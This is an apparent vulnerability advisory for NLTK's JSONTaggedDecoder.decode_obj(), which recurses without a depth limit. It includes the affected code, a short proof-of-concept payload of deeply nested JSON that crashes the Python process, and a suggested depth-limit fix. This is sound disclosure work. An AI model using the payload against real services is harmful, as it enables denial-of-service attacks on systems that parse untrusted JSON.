Improper resource allocation In nltk

Description

Natural Language Toolkit (NLTK) has unbounded recursion in JSONTaggedDecoder.decode_obj() may cause DoS

Summary

JSONTaggedDecoder.decode_obj() in nltk/jsontags.py calls itself recursively without any depth limit. A deeply nested JSON structure exceeding sys.getrecursionlimit() (default: 1000) will raise an unhandled RecursionError, crashing the Python process.

Affected code

File: nltk/jsontags.py, lines 47–52

@classmethod
def decode_obj(cls, obj):
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}
    elif isinstance(obj, list):
        obj = list(cls.decode_obj(val) for val in obj)

Proof of Concept

import sys, json
from nltk.jsontags import JSONTaggedDecoder

depth = sys.getrecursionlimit() + 50  # e.g. 1050
payload = '{"x":' * depth + "null" + "}" * depth

# Raises RecursionError, crashing the process
json.loads(payload, cls=JSONTaggedDecoder)...

Impact

Any code path that passes externally-supplied JSON to JSONTaggedDecoder is vulnerable to denial of service. The severity depends on whether such a path exists in the calling code (e.g. nltk/data.py).

Suggested Fix

Add a depth parameter with a hard limit:

@classmethod
def decode_obj(cls, obj, _depth=0):
    if _depth > 100:
        raise ValueError("JSON nesting too deep")
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val, _depth + 1) 
               for (key, val) in obj.items()}
    elif isinstance(obj, list):...

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions